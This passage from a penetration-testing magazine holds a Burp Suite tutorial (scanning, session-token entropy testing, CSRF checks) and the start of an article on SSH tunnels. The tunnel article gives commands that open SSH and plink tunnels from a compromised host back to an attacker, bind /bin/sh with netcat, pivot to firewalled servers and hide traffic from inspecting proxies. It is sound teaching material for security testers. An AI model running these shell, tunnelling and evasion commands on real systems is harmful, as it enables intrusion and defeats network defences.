• Decoder: Burp Decoder is a simple tool for transforming encoded data into its canonical form, or for transforming raw data into various encoded and hashed forms.
• Comparer: Burp Comparer is a simple tool for performing a comparison, i.e. a visual difference, between any two items of data.
Source: http://portswigger.net/burp/.
Web Application Penetration Testing
In web application penetration testing there are two main approaches: automated and manual testing. Automated testing relies on scanning tools such as Burp Scanner, IBM Appscan Standard, and others to identify security vulnerabilities in web applications. Manual testing, on the other hand, extends the scope of testing through the use of manual hacking techniques. These techniques include tests for privilege escalation, authentication and authorization, as well as SQL injection. In this section, I begin by describing how to use Burp Proxy and move on to describe how to use Burp Scanner to perform automated scanning.
Page 46
http://pentestmag.com
I will follow with a discussion of manual testing techniques using different features of Burp Suite.
Configuring Burp Proxy
Just like other proxy tools, Burp acts as a local proxy which allows users to intercept HTTP requests and responses. To begin, let's configure the web browser's local proxy settings to use Burp Suite. First, set the browser proxy to a listening port. In Firefox, go to Preferences and click on the Advanced tab -> Network. Configure the browser proxy to listen on localhost port 8080. Burp Proxy uses port 8080 by default but this can be changed to any port you wish. Figure 1 below shows how I configured Firefox to use Burp Proxy to intercept all HTTP traffic.
When you open the Burp Proxy tool you can verify the proxy is running by clicking on the Options tab. Notice that Burp Proxy uses 8080 as the default port (Figure 2). Now that the proxy is running, we will begin logging the requests and responses that pass through it. As an illustration, I will browse through an example website (www.google.com) to intercept requests and responses by enabling the feature under the Intercept tab. However, we need to ensure that Burp Proxy is configured to intercept these requests by setting the checkmark under the Options tab (likewise for server responses; Figure 3).
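Scripted clients can be pointed at the same listener so their traffic shows up in the proxy history. This minimal helper builds the proxy mapping for Burp's default address; the commented requests call is an assumption about the client library, not part of Burp itself:

```python
def burp_proxies(host="127.0.0.1", port=8080):
    # Build the proxy mapping most Python HTTP clients accept,
    # using Burp's default listener address.
    proxy = f"http://{host}:{port}"
    return {"http": proxy, "https": proxy}

# Hypothetical usage with the third-party requests library:
#   requests.get("http://demo.testfire.net", proxies=burp_proxies())
print(burp_proxies())
```

Note that intercepting HTTPS this way additionally requires trusting Burp's CA certificate in the client.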
Using the Scanner Tool
The Scanner tool is available in the Burp Professional version from Portswigger (currently v1.5). Go to the Scanner -> Live Scanning tab and you will see the following radio options (Figure 4). The Live Passive Scanning feature allows Burp to passively check traffic going through the proxy for security vulnerabilities. In contrast, the Live Active Scanning feature initiates HTTP requests and responses using a pre-determined list of test cases. Burp
Figure 3. Intercepting HTTP Requests using Burp Proxy
Figure 1. Configuring Firefox Proxy Settings
Figure 2. Configuring Burp to Listen on Port 8080 OPEN 01/2013
Figure 4. Live Scanning Tab Features Page 47
http://pentestmag.com
Burp Scanner uses heuristics to select a subset of test cases to check for common vulnerabilities. Choosing the "Use suite scope" radio option restricts scanning to the domains defined in your Target tab. Go to the Scanner->Options tab and scroll down to the end of the panel. As depicted, the different passive scanning areas are listed as checkmarks. These checkmarks control the types of tests performed during passive scanning. Passive scanning looks at header fields, form parameters, cookies and other fields when requests and responses are intercepted through Burp Proxy. Examples of flaws identified using passive scanning include information disclosure, insecure use of SSL, and cross-domain exposure. The advantage of passive scanning is that it lets you safely find security vulnerabilities without sending any additional requests to the application (Figure 5 and Figure 6). Scrolling up you will see the Active Scanning Options. These options control the types of tests performed during active scanning. Burp Scanner will actively send malicious HTTP requests for all in-scope URLs to test for SQL injection, cross-site scripting, and other types of injection. In order to perform a thorough scan, you need to walk Burp Scanner through the interesting parts of the application's functionality. Let's test the effectiveness of Burp Scanner on a demo site (http://demo.testfire.net). This website is a demo bank web application developed by IBM to illustrate the use of their commercial IBM Appscan Standard tool. We illustrate using Burp Scanner on this website, but other vulnerable demo web applications could also be used. After you have configured the browser proxy to an actively listening port on Burp, log in to the application using the following credentials (as provided by the demo authors):

Username: jsmith
Password: Demo1234

Figure 5. Passive Scanning Options
Figure 6. Active Scanning Options
Figure 7. Adding Target to Scope
By browsing through the application, you will see the domain of the site under the Target tab. To use this tool, it is best to first define the scope of the scan using the Target tab. As shown in Figure 7, include the domain (demo.testfire.net) by right clicking on the URL under the Target tab and selecting "Add to Scope". You will notice that a regex string ^demo\.testfire\.net is added under the Scope sub-tab. You can also choose to exclude some path URLs. Click on the gray horizontal bar called "Filter" just under the tabs and select "Show only in-scope items" (Figure 8).
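To make the scope mechanics concrete, here is a hypothetical re-implementation of the in-scope host check using the regex shown in the Scope sub-tab. The trailing anchor is my addition for illustration; this is a sketch of the idea, not Burp's actual matching code:

```python
import re
from urllib.parse import urlparse

# Regex as displayed in Burp's Scope sub-tab, anchored at both ends here.
SCOPE_HOST = re.compile(r"^demo\.testfire\.net$")

def in_scope(url):
    """Return True when the URL's host matches the scope expression,
    roughly what "Show only in-scope items" filters on."""
    host = urlparse(url).hostname or ""
    return bool(SCOPE_HOST.match(host))
```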
After configuring Burp's scanning options, you will notice that the scanner kicks off once browsing has started. You can see the progress of the active scan in the Scanner->Scan Queue tab, which lists the host, the path of the web content being tested, and the test progress status. The tab shows the queue of test cases with different colors to signify the severity level of the findings: red for high, orange for medium, yellow for low, and gray for informational. In the Scanner->Results tab, the list of URLs is shown in the left panel with the corresponding findings on the right. For each selected finding, an advisory describing the potential vulnerability is presented and the raw HTTP request/response is included. The scanner tool allows us to change the severity and confidence levels of each finding. The severity level rates the finding based on its security impact and likelihood of being exploited. The confidence level is a measure of how certain the scanner is that the finding is a true vulnerability. These ratings can be modified manually on a particular issue simply by right-clicking and selecting the desired level. In addition to changing the ratings on a finding, you can also delete findings or mark them as false positives.
Figure 8. Setting Show Only In-Scope Items
Figure 9. Demo Testfire Login
Figure 10. Demo Testfire Main Page
Figure 11. Burp Active Scan Progress
Figure 12. Burp Scan Results
Evaluation Tools
In the previous section, we used Burp Scanner for automated vulnerability scanning of web applications. This is a very efficient way to kick off a web application penetration test, as it enables you to discover the application’s weaknesses before moving on to manual exploitation. The premise is that by identifying vulnerabilities in an application quickly, we will be able to fix these issues before hackers take advantage of them. However, automated scanning does not cover everything and manual testing is needed to discover issues such as Cross-Site Request Forgery (CSRF), business logic flaws and stored XSS. Below, I describe additional tools in Burp Suite that can help you identify these types of issues.
Sequencer to Assess Randomness of Session Data
One important part of web application penetration testing is the evaluation of the randomness of the session data/tokens used by an application. The Sequencer tool is well suited for this type of testing because it tests the entropy of tokens by capturing multiple sequences of data/tokens for statistical analysis. In order to use the Sequencer tool, we need to send out a request which sets the token we are trying to assess. For example, if we are evaluating the randomness of the ASP.NET_SessionId cookie for the demo Testfire application, we search for the request/response in which this session cookie is set. Looking at the History tab, we see that the session cookie is set in the response to the initial GET request for the login page, /bank/login.aspx. To capture the request, we right click on the item in the History tab and send it to the Sequencer tool (Figure 13). The Sequencer tool automatically retrieves the tokens in the response. We can check this under the Sequencer->Live Capture sub-tab. Under the "Token Location Within Response" section, you will see the populated token values in a drop-down box where you can mark the value to test. In our case, the token we are looking for is the session cookie, so we select the "Cookie" radio item and choose the ASP.NET_SessionId item in the drop-down box. Clicking on the "Start capture" button will launch the Sequencer live capture window. As depicted, Sequencer will send out multiple requests automatically and record the cookie value received in the responses. In order to perform the entropy analysis, Sequencer needs to capture at least 100 token values; a sample size of 1000 tokens is sufficient for a statistically significant outcome. Once you have captured enough tokens, click on the "Analyze now" button to analyze the captured values immediately. As described by PortSwigger, Sequencer performs two types of analysis: character-level analysis and bit-level analysis. Both are enabled by default, but you can turn them on or off in the Options tab. There are two types of character-level analysis supported by Sequencer:

• Character count analysis: tests the frequency distribution of characters used at each position within a token.
• Character transition analysis: measures the likelihood of one character appearing after another, thus evaluating the transition probabilities within the tokens in a sample.
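The character count idea is easy to reproduce. The sketch below is my own illustration of the concept, not Burp's algorithm: it tallies the characters seen at each position across a token sample and converts each position's distribution into Shannon entropy. Positions dominated by a single character contribute no entropy:

```python
import math
from collections import Counter

def position_counts(tokens):
    """Character frequency at each position across a sample of tokens
    (truncated to the shortest token's length)."""
    length = min(len(t) for t in tokens)
    return [Counter(t[i] for t in tokens) for i in range(length)]

def position_entropy(counter):
    """Shannon entropy in bits of one position's character distribution."""
    total = sum(counter.values())
    return -sum((n / total) * math.log2(n / total)
                for n in counter.values())

# Example sample: position 0 is constant, position 2 varies fully.
sample = ["abc", "abd", "abe", "abf"]
cols = position_counts(sample)
```

A real session token should show high per-position entropy across the sample; a constant prefix, as at position 0 above, is a red flag.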
Figure 13. Sending Session Cookie to Sequencer
Figure 14. Configuring Sequencer
Sequencer also supports seven types of bit-level analysis adapted from the standardized FIPS tests. These are:

• FIPS monobit test: analyzes the distribution of ones and zeros at each bit position.
• FIPS poker test: divides a bit sequence into consecutive groups, counts the occurrences of each group, and performs a chi-square calculation to evaluate the distribution.
• FIPS runs test: divides the bit sequence at each position into runs of consecutive bits which have the same value.
• FIPS long runs test: measures the longest run of bits with the same value at each bit position.
• Spectral test: performs a spectral analysis of the bit sequence at each position.
• Correlation test: measures the amount of randomness at each bit position calculated in isolation.
• Compression test: evaluates the amount of entropy at each bit position by compressing the bit sequence using standard ZLIB compression (Figure 15 and Figure 16).

Figure 15. Running Live Capture in Burp Sequencer
Figure 16. Entropy Results for Session Cookie

Testing Methodology
In addition to using the different tools in Burp Suite, the objective of this article is to walk you through a step-by-step process of what is actually involved in a web application penetration test. Initially, we started the discussion by describing how to configure Burp Proxy and initiate a vulnerability scan. Automated scanning is an easy way to start the assessment, as it gives you coverage of the potential vulnerabilities in an application. We noticed that whenever Burp Scanner identifies a vulnerability, it assigns a severity and confidence level based upon impact. Essentially, our task after this step is to manually verify the findings and investigate those that Burp Scanner doubts, as they may be false positives or they may be clues to a hidden vulnerability. However, in order to properly evaluate an application, we need to devise a testing methodology for every vulnerability we encounter. Since it would go beyond the scope of this expository article to present testing methods for every web application vulnerability type, we will confine ourselves to a single example. We will explore Cross Site Request Forgery (CSRF) and explain how to evaluate the proper mitigation techniques and whether or not they are in place to defend against CSRF.

Verifying Cross Site Request Forgery
Cross site request forgery (CSRF) vulnerabilities exist when an application fails to ensure that a valid user intentionally initiated a request to the server. When this weakness is present in an application, a malicious user can force a victim's browser to submit a request by tricking the user into navigating to a malicious page controlled by the attacker. This page contains code which automatically submits a malicious request to the target application. If the legitimate user is currently authenticated to the application, the malicious request will successfully execute, thereby allowing the attacker to perform any actions the application provides to a valid user. Below, I show a flow chart of the testing methodology that I use to verify if proper mitigation techniques are in place.
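As an illustration of the first FIPS check listed above, the monobit test can be sketched in a few lines. The pass interval (between 9,654 and 10,346 ones in a 20,000-bit sample) comes from the FIPS 140-1 standard; this is my own minimal sketch of the test, not Sequencer's implementation:

```python
def fips_monobit(bits):
    """FIPS 140-1 monobit test: a 20,000-bit sample passes when the
    count of ones lies strictly between 9,654 and 10,346."""
    if len(bits) != 20000:
        raise ValueError("monobit test is defined over 20,000 bits")
    ones = sum(bits)
    return 9654 < ones < 10346
```

A perfectly balanced alternating sequence passes, while a constant stream of ones fails, since every bit is a one.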
Figure 17 describes the method for testing the strength of CSRF mitigation techniques. As shown in the flowchart, the first step is to determine whether a webpage needs to be CSRF protected. If the action performed is not sensitive, for example a search page, the page does not need to be CSRF protected as forging the request does not benefit the attacker. After we have determined that the page does need CSRF protection, we check whether there is something in the request that is secret to the attacker. This secret can be implemented as a required token embedded as a hidden field parameter, but it can also be a Viewstate parameter, a password or a Captcha. To check whether a CSRF token exists, we go through the following steps:

• Using the Burp Proxy tool, we set up the proxy.
• We navigate to the form page and fill in the details.
• We intercept the form submission using Burp.

This form submission could be a POST request like the one shown below:
Figure 17. Testing Methodology to Assess CSRF Protection
POST /users/Profile HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html, application/xhtml+xml, application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US, en; q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie:
Content-Type: application/x-www-form-urlencoded
Content-Length: 119

firstname=user&lastname=name&age=29&sex=F&Randomtoken=xxxxxxxxxx
We notice that the Randomtoken parameter is in the body of the request. It is important to see how the token is implemented. If the token is implemented as a cookie then it does not counter a CSRF attack, because cookies are sent automatically by the user's browser whenever the user is tricked into sending a forged request. After checking that the token is implemented correctly, we verify whether the token is actually used by the web application to process the request. Sometimes developers introduce CSRF tokens but the server-side validation logic is missing. To check for this, intercept the POST request using Burp Proxy and remove the Randomtoken parameter. If the server still processes the request, the parameter is not being checked. You can also modify the token and see if the behavior of the application changes; if so, the web application is inspecting the token. Next, we determine whether the token is guessable. You can verify this using the Sequencer tool described earlier to measure the entropy. Finally, we investigate whether the token is unique per session, per page, or per user, which determines the strength of the mitigation token. To check whether a token is unique per session, we log in to the application and record the token. Then we log out, clear the session data from the browser, and log in to the application again. If the generated token is different in the second session, and we verify this multiple times, we can infer that it is unique per session. Generally speaking, if the token has passed the entropy tests in Burp Sequencer, it is most likely unique per session. We can test whether it is unique per page by hitting different pages and viewing the token in the body
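The replay step, resubmitting the request without the token, can be scripted. The helper below is my own illustration; the parameter name Randomtoken is taken from the example request above. It rebuilds the urlencoded body with the token removed, ready to be replayed through Burp Repeater or any HTTP client:

```python
from urllib.parse import parse_qs, urlencode

def strip_token(body, token_name="Randomtoken"):
    """Rebuild a urlencoded request body with the CSRF token removed,
    to test whether the server still accepts the request without it."""
    params = parse_qs(body, keep_blank_values=True)
    params.pop(token_name, None)  # drop the token if present
    return urlencode(params, doseq=True)

# Body taken from the example POST request above:
body = "firstname=user&lastname=name&age=29&sex=F&Randomtoken=xxxxxxxxxx"
```

If the application answers the stripped request exactly as it answered the original, the token is decorative and the page is effectively unprotected.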
of the request. If the token is unique per page and per session, it is considered strong CSRF protection. If it is only unique per session, its rating is medium. If it is not unique per session, we check whether different users have different tokens. If that is the case, the token is considered weak because it is fixed.
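The rating logic just described reduces to a few conditionals. This encoding is my own summary of the rules above; the fallback case (no uniqueness at all) is not covered by the flowchart and is my assumption:

```python
def rate_csrf_token(unique_per_session, unique_per_page, unique_per_user):
    """Rate CSRF token strength: unique per page and per session is
    strong, per session only is medium, merely per user (fixed) is weak."""
    if unique_per_session and unique_per_page:
        return "strong"
    if unique_per_session:
        return "medium"
    if unique_per_user:
        return "weak"
    # Not in the flowchart: a token shared by all users protects nothing.
    return "unprotected"
```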
CSRF Proof-of-Concept Generation
Burp Pro provides a feature that generates Proof of Concept (PoC) HTML pages to demonstrate the presence of CSRF. The PoC can be generated from the POST request. To generate the PoC:

• Right click on the POST request and go to Engagement tools->Generate CSRF PoC.
• The POST request is displayed in the top text box and the corresponding HTML snippet is generated in the bottom text box. Copy the HTML snippet and save it in a file, naming the file as an HTML page **.html.
• To illustrate the concept, log in to the application and double click on the PoC HTML page.
• Once the file is opened in your web browser, click on the "Submit" button (Figure 18).
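To show what such a PoC page boils down to, here is a hand-rolled generator. It is an approximation of the output, not Burp's actual template: a self-contained HTML page containing a POST form pre-filled with the captured parameters:

```python
import html

def csrf_poc(action_url, params):
    """Build a CSRF PoC page: a POST form pre-filled with the captured
    parameters and a submit button, in the spirit of Burp's snippet."""
    fields = "\n".join(
        '    <input type="hidden" name="%s" value="%s"/>'
        % (html.escape(k, quote=True), html.escape(v, quote=True))
        for k, v in params.items())
    return ('<html><body>\n'
            '  <form action="%s" method="POST">\n%s\n'
            '    <input type="submit" value="Submit"/>\n'
            '  </form>\n'
            '</body></html>' % (html.escape(action_url, quote=True), fields))
```

If a victim who is logged in to the target opens this page and the submission succeeds, the request is forgeable; Burp's own version can additionally auto-submit the form via script.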
Highlighting Features
The highlighting features of Burp Proxy enable you to color items of HTTP requests/responses in the Proxy->History tab, which is convenient for viewing and following up with the traces. This can be done simply by right-clicking on an item in the History sub-tab and selecting a color in the Highlight option. Personally, I assign different colors to different types of requests. For example, I might give login POST requests and logout requests a red color, a green color to requests/responses that are in session, and a different color to requests/responses that are out of session (Figure 19).
Search Features
Burp search features allow you to find specific strings such as cookie names, headers, body messages and parameters in the list of HTTP requests and responses in the History tab. This enables digging into raw requests/responses quickly to extract information for pen-testing or troubleshooting. There are many examples where this search feature is useful. One example is to check the HttpOnly and Secure settings on a session cookie, which we can do simply by searching for where the session cookie is set. In Figure 20, we use the search feature to locate where the ASP.NET_SessionId cookie is set, and we can see that this cookie is set in the response of the second GET request (under the start page /default.aspx). Whenever there is a match for the search string, Burp will highlight in yellow the portion of the request/response where it found that string and will indicate the number of matches in the lower right corner of the GUI (Figure 20).

Troubleshooting with Burp
In addition to using Burp Suite to carry out manual pen-tests, Burp can be a great tool to troubleshoot web applications and vulnerability scanners. I have consistently used Burp in combination with IBM Appscan Standard to fill in details that Appscan misses in its generated requests. Examples of this include defining upstream proxies that handle connectivity to applications as well as using the match and replace feature to fill in missing credentials. Below I give details on additional features of Burp that help in troubleshooting.

Figure 18. Generating Proof-of-Concept CSRF using Burp
Figure 19. Burp Highlighting Features
Figure 20. Burp Search Feature
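The HttpOnly/Secure review mentioned under Search Features can also be automated. This helper is my own sketch; it inspects a raw Set-Cookie header value for the two attributes:

```python
def cookie_flags(set_cookie_value):
    """Report whether a Set-Cookie header value carries the HttpOnly
    and Secure attributes (attribute names are case-insensitive)."""
    attrs = [part.strip().lower()
             for part in set_cookie_value.split(";")[1:]]
    return {"httponly": "httponly" in attrs, "secure": "secure" in attrs}
```

Running it over every Set-Cookie header captured in the proxy history gives the same answer as the manual search, for every cookie at once.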
Saving the Burp State
From my experience, saving the Burp state is important not only for pausing and resuming work in Burp but also for collecting auditable artifacts for penetration testing engagements. It is generally considered good practice for pen-testers to record the raw HTTP request/response history and scan configurations during pen-tests. This helps pen-testers and developers to replicate the findings and troubleshoot the application. To save the Burp state, simply go to Burp->Save State. This feature is only available in the Pro version of Burp. Once you click on the "Save State" item, a dialogue box appears which asks which items you would like to save the state of. Following this dialogue, select the items and save the Burp state file in your file system. To reload the Burp state, simply go to Burp->Restore State and point to the file (Figure 21).

Final Remarks
Burp Suite is an enriched set of tools that work together to get your web application penetration tasks done. The purpose of this article is to cover the features of Burp that I use during my engagements. There are many tutorials on the Internet explaining different features of Burp including the Intruder, Spider, and other tools. These tutorials are well-illustrated with examples and walk-through exercises. However, what I want to emphasize here is how to use these sets of tools as part of your testing process and not just for the sake of what the tool set offers in terms of features. Going from proxy configuration and vulnerability scanning to manual assessment and troubleshooting, these are the key components of this process.
Omar Al Ibrahim
Figure 21. Burp Save State Wizard
Omar Al Ibrahim received his Ph.D. in Computer Science from Southern Methodist University, Dallas, TX, in 2012 and his Master’s degree in Computer Science from Rice University, Houston, TX, in 2007. During his Ph.D. Omar conducted research in embedded security where he developed scalable approaches for resource-constrained embedded environments including low-cost RFID and sensors. Recently, Omar has joined Virtual Security Research (VSR) in Boston, MA, as a security consultant where he conducts web application penetration testing and secure code review.
SSH TUNNELS
SSH Tunnels: How to Attack Their Security
In this article, we will concentrate on the use of SSH tunnels independently of the protocols we need to run on top of them. We will pay particular attention to how the tunnel works and how it can help us elude the security controls which have been implemented within the infrastructure we are testing. After that, we will change our point of view and see how to attack SSH.
We will exploit the privilege separation feature in order to steal login passwords in the SSH daemon's inter-process communication, as well as sniff entire user sessions. Secure Shell (SSH) tunnels are very useful tools that every professional penetration tester should master and be able to use to the best of their capabilities. An SSH tunnel consists of an encrypted communication channel created through the use of the SSH protocol and is mainly used to encapsulate traffic of other protocols, such as Remote Desktop Protocol (RDP), Common Internet File System (CIFS), rsync, etc., in order to benefit from encryption. SSH tunnels are very useful during penetration testing because they enable the bypass of a number of security measures commonly implemented by systems administrators to harden their infrastructures, such as: network level anti-virus, network and web application firewalls (WAF), intrusion detection systems (IDS), intrusion prevention systems (IPS) and deep packet inspection (DPI) devices.
Used tools and applications
All of the tools and applications used in this article can be installed in any apt or yum based Linux distribution simply by running:
apt-get install tool-name
or yum install tool-name
For each tool used in the article, I suggest carefully reading the entire manual page by using the man command or by looking it up on the Internet. All of the Windows tools we will use are freely distributed by their developers in executable format and can be run from the command line from the directory into which they have been downloaded.

Netcat basics
Netcat is a very useful network tool. As we can read from its man page, it "is a simple Unix utility which reads and writes data across network connections, using TCP or UDP protocol". This tool permits us to open a socket on the local machine, or to connect to one that is already open. As we said, in the examples provided we will not care about the protocol that will be encapsulated over the tunnel but will instead focus on the tunnel itself. In order to be as generic as possible, we will use Netcat to open sockets and establish connections.
nc -lvp <PORT> [-c command]

Opens a socket on localhost on the given port number and executes Netcat in listen mode on that socket.

nc -vn <IP_ADDRESS> <PORT> [-c command]

Establishes a connection to the given socket. If the -c command argument is passed, Netcat will execute the shell command immediately after the connection is established, sending its output to the other peer or, if interactive, piping the socket into its standard input and its output to the socket.

Netstat basics
Netstat is a useful system utility with features that can be used to gain an overall view of open network connections, Unix sockets, routing tables, interface statistics, masquerade connections and multicast memberships on the local machine. During this article, we will use netstat to analyze established connections so that we can better understand why each attack works by having a look at what's happening under the hood. The syntax varies depending on the platform. In Linux, we will use the netstat command without any arguments in order to view information on all open socket connections. Only relevant lines will be reported in the listings.

A note on SSH authentication
Depending on the scenario, some of the SSH tunneling examples have to be run with password-less authentication in order to work, such as when using DSA/RSA public key authentication. For brevity, the steps needed to implement public key authentication are not described in this article. If you are not familiar with this authentication technique, check the "On the web" paragraph for a link to a short how-to.

A note on local security
In some examples, we will connect SSH sessions directly from the tested/compromised machine to our workstation by typing the password of the user that logs in to our machine on the command line of the compromised one. In these cases, I always recommend creating a local unprivileged user account with a chrooted shell environment on our machine. What chroot environments are and how to configure them goes beyond the scope of this article, and their configuration depends heavily on the operating system we are using. Have a look at the "On the web" paragraph to find a web reference on how to do it on Linux, and adapt it to your workstation's environment.
Bypassing Security Measures with SSH Tunnels
Firewalls and web application firewalls
During a penetration test, you can sometimes get lucky. That happens, for example, if we find a service affected by a vulnerability that can be exploited to achieve remote code execution. Let's suppose that we have successfully exploited such a vulnerability and have a remote shell on the compromised machine. Now, we want to connect to a service that is not reachable from outside, such as a database engine or a CIFS share.
Figure 1. Remote port forwarding over SSH tunnel
The service could be filtered by both a network firewall and a personal firewall on the host so that only connections from the local network (or even only localhost) are accepted. To connect, we can open an SSH tunnel from the compromised machine to our workstation. Suppose that both machines are running Linux and the service that we want to connect to is running on port 1025. We will execute the following command on the compromised machine to establish remote port forwarding over an SSH tunnel:

ssh -f -N -R 5555:localhost:1025 <our_ip_address>
Seen from the remote machine, port 5555 on our system is forwarded through the SSH tunnel to its localhost on port 1025 (option -R 5555:localhost:1025), without executing any remote command after connection establishment (option -N) and putting the SSH process in the background (option -f). We can now access the service on the victim's machine by connecting to our loopback interface on port 5555. Figure 1 illustrates the connection from our workstation to the remote machine through the SSH tunnel. To complete the example, we can use Netcat to open a socket on the victim machine (port 1025) and
connect to it from our workstation. Listing 1 shows the remote shell on the compromised host (victim), Listing 2 shows the local shell on our workstation (attacker). The IP configuration is 172.23.69.101 (victim) and 172.23.69.102 (attacker). Listing 3 shows the results from the netstat command on the compromised host. We can see that the connection to port 1025 comes from localhost. This means that we have accomplished our goal and eluded both the appliance and the personal firewall. With the same strategy, we can also elude an appliance web application firewall (WAF). Let’s suppose that in the same scenario, a WAF is filtering our attempts to inject SQL statements into a form served by the compromised machine. Encrypting traffic from our workstation to the web server will make impossible for the firewall to inspect our HTTP requests and will result in letting us bypass this checkpoint. To do it, we just have to exchange the 1025 port with the port on which the web server is listening (port 80 for HTTP or 443 for HTTPS). NAT’d or firewalled hosts though compromised machines Another common scenario where using SSH tunnels is helpful during penetration testing is the use
Listing 1. Remote shell from compromised host user@victim:/$ ssh -l attacker -f -N -R 5555:localhost:1025 172.23.69.102 attacker@172.23.69.102’s password: user@victim:/$ nc -lvp 1025 -c /bin/sh listening on [any] 1025 ... connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 51519
Listing 2. Connecting to the remote service through the SSH tunnel attacker@attacker:/$ nc -vn 127.0.0.1 5555 (UNKNOWN) [127.0.0.1] 5555 (?) open uname -a Linux 101-victim (…) GNU/Linux
Listing 3. The netstat command executed on the victim machine Proto Recv-Q Send-Q Local Address tcp 0 0 localhost:1025 tcp 0 0 localhost:51519 tcp 0 0 172.23.69.101:35284
OPEN 01/2013
Foreign Address localhost:51519 localhost:1025 172.23.69.102:ssh
Page 58
State ESTABLISHED ESTABLISHED ESTABLISHED
http://pentestmag.com
of a compromised a machine to connect to other machines on the network that are not exposed to the Internet (for example, NAT’d or firewalled hosts). In this example, we will imagine that we have compromised a Microsoft Windows client and have the possibility to run arbitrary code on it with the permissions of the logged-in user. We have installed a sniffer; and through sniffing remote traffic, we have found a server on the same network running services that we may want to connect to, such as CIFS shares or IMAP mail. Since the operating system of the compromised machine is Windows, we will use Plink in order to
establish the SSH tunnel. Plink is one of the PuTTY suite command line tools, a free implementation of Telnet and SSH written by Simon Tatham. If you are new to PuTTY, have a look at the "On the web" paragraph to find a reference to the official page of the project. After downloading the plink.exe executable on the Windows host, we will create an SSH tunnel with remote port forwarding from one port on our workstation to a port on the compromised machine. Next, we will configure the compromised host to forward incoming connections on that port to the port running the daemon we want to connect to. To do that we will use Fpipe, a free tool developed by McAfee that acts as a port redirector on Windows hosts. You can find a reference to the Fpipe home page in the "On the web" paragraph. Let's suppose the attack machine has an IP address of 10.10.10.10, the compromised machine 172.16.0.10, the server 172.16.0.20, and the service is running on port 6666. We can open the tunnel by executing the following command:

plink.exe -batch -l <local_user> -pw <password> -R 1234:localhost:5555 <our_ip_address>
Seen from the remote machine, port 1234 on the attack machine is forwarded through the SSH tunnel to localhost (the compromised host) on port 5555 (option -R 1234:localhost:5555), disabling all interactive prompting (option -batch) such as
Figure 2. Port forwarding chain to reach NAT’d server
Listing 4. The output of the netstat command on the three systems

Windows Host
C:\Users\user>netstat -n | find “ESTABLISHED”
  TCP  172.16.0.10:49177  10.10.10.10:22     ESTABLISHED
  TCP  127.0.0.1:5555     127.0.0.1:49181    ESTABLISHED
  TCP  127.0.0.1:49181    127.0.0.1:5555     ESTABLISHED
  TCP  172.16.0.10:49182  172.16.0.20:6666   ESTABLISHED

Attack Machine
user@attacker$ netstat -n | grep ESTABLISHED
tcp  0  0  10.10.10.10:22    172.16.0.10:49177  ESTABLISHED
tcp  0  0  127.0.0.1:1234    127.0.0.1:44045    ESTABLISHED
tcp  0  0  127.0.0.1:44045   127.0.0.1:1234     ESTABLISHED

Remote Server
user@server$ netstat -n | grep ESTABLISHED
tcp  0  0  172.16.0.20:6666  172.16.0.10:49182  ESTABLISHED

OPEN 01/2013
Page 59
http://pentestmag.com
SSH TUNNELS

the host-key confirmation prompt at the first key exchange between hosts. The -l and -pw options supply the username and password of a user on the attack machine, so that SSH can authenticate. We can now enable port forwarding by executing:

FPipe.exe -l 5555 -r 6666 172.16.0.20
This command forwards the local SSH tunnel endpoint port (option -l 5555) to the server (argument 172.16.0.20) on the port that runs the service we want to connect to (option -r 6666). Figure 2 shows how the port forwarding chain works. As in the first example, we can test the connection by executing a Netcat listening command on the remote server:

user@server$ nc -lvp 6666 -c /bin/sh
Next, we connect to it on our local port 1234:

user@attacker$ nc -vn 127.0.0.1 1234
To inspect and better understand the internals of the port forwarding chain, we can now use the netstat command on the three systems. In Listing 4 we pipe the output to the grep or find command (depending on the system) to see only the rows of interest. On the Windows host, we see four connections: the first is the SSH connection to our workstation used to establish the tunnel (remote port 22); the second and third are the two ends of the local connection to port 5555, the endpoint of the established SSH tunnel. The fourth is the
connection to the server created by the Fpipe port redirector (remote port 6666). On the attack machine, we have three connections: the first is the SSH connection opened by the Windows host (local port 22); the second and third are the two ends of the local connection to port 1234, the endpoint of the established SSH tunnel. On the remote server, only one connection is established, on local port 6666 (the one that comes from our machine through the SSH tunnel and is forwarded by the compromised host). Notice that, from the remote server’s point of view, the connection comes from the compromised Windows host (remote IP 172.16.0.10). So, we have reached the NAT’d machine, eluding any appliance or local firewall configuration on the remote network.

Proxies and content inspection

We began the first section by saying that sometimes luck can help even during a penetration test. However, in the previous examples we have probably been a little too lucky. First of all, the compromised machines were allowed to traverse the firewall for outbound connections; secondly, there wasn’t any kind of content inspection on the traffic generated from the machine to the Internet and vice versa. To work on a more realistic scenario, let’s now suppose that the system we are testing can only reach the Internet on ports 80 and 443, and that it sits behind a proxy acting as a content inspection device, verifying that the outbound traffic matches the protocol expected on each allowed port. In this scenario, it wouldn’t be simple to establish the reverse shell after executing remote code on the
Listing 5. Establishing a tunnel through the proxy and encapsulating an SSH tunnel over it

victim$ proxytunnel -v -a 1025 -p 172.23.69.102:8080 -d 10.10.10.10:443
victim$ ssh -f -N -q -R 5555:localhost:6666 localhost -p 1025   # Note: RSA public key authentication required
victim$ nc -lvp 6666 -c /bin/sh
listening on [any] 6666 ...
connect to [127.0.0.1] from localhost [127.0.0.1] 57676
Listing 6. Connecting to the created SSH tunnel from the attacker’s workstation

attacker$ nc -vn 127.0.0.1 5555
uname -a
Linux 101-victim (…) GNU/Linux
machine, because we need to disguise our traffic to respect the protocol verification requirements of the proxy in order to elude inspection. This can be done by encapsulating our SSH tunnel in an HTTP tunnel. To accomplish this, we can use a tunneling application called Proxytunnel. After downloading and compiling it (the only dependency is OpenSSL), we have to upload it from our machine to the compromised server and execute it. Let’s suppose the victim has IP 172.23.69.101, the proxy 172.23.69.102, and our machine 10.10.10.10. The proxy is listening on port 8080 and we have configured our SSH daemon to bind to port 443 on our workstation. We have already uploaded Proxytunnel’s executable to the victim workstation. In Listing 5, we establish a tunnel through the proxy (option -p 172.23.69.102:8080) from local port 1025 (option -a 1025; since we may have exploited a service run by an unprivileged user, we have to choose a port greater than 1024) to our workstation’s port 443 (option -d 10.10.10.10:443). Next, passing through the created tunnel, we establish a new SSH tunnel that forwards port 5555 on our workstation to local port 6666. Finally, we open a Netcat socket on port 6666.
